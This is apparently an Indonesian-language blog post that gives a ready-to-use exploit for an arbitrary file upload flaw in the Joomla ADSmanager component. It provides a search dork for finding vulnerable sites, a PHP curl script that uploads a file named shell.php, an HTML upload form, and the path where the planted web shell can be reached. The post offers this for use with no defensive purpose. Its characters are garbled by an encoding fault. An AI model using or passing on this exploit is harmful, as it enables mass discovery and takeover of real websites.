Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
Oleh
chmood
Joomla ADSmanager Exploit Arbitrary File Upload Vulnerabilit
Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :<?php$urlΒ =Β βblabla.com/index.php?option=com_adsmanager&task=upload&tmpl=componentβ;Β // put URL Here$postΒ =Β array(βfileβΒ =>Β β@shell.jpgβ,βnameβΒ =>Β βshell.phpβ);$chΒ =Β curl_initΒ (β$urlβ);curl_setoptΒ ($ch,Β CURLOPT_RETURNTRANSFER,Β 1);curl_setoptΒ ($ch,Β CURLOPT_FOLLOWLOCATION,Β 1);curl_setoptΒ ($ch,Β CURLOPT_USERAGENT,Β βMozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0β³);curl_setoptΒ ($ch,Β CURLOPT_CONNECTTIMEOUT,Β 5);curl_setoptΒ ($ch,Β CURLOPT_SSL_VERIFYPEER,Β 0);curl_setoptΒ ($ch,Β CURLOPT_SSL_VERIFYHOST,Β 0);curl_setoptΒ ($ch,Β CURLOPT_POST,Β 1);@curl_setoptΒ ($ch,Β CURLOPT_POSTFIELDS,Β $post);$dataΒ =Β curl_execΒ ($ch);curl_closeΒ ($ch);echoΒ $data;?>#CSRF :<form method=βPOSTβ action=βTARGET/index.php?option=com_adsmanager&task=upload&tmpl=componentβenctype=βmultipart/form-dataβ><input type=βfileβ name=βfiles[]β /><button>Upload</button></form>
Acces Shell: site.com/tmp/plupload/shell.php
Komentar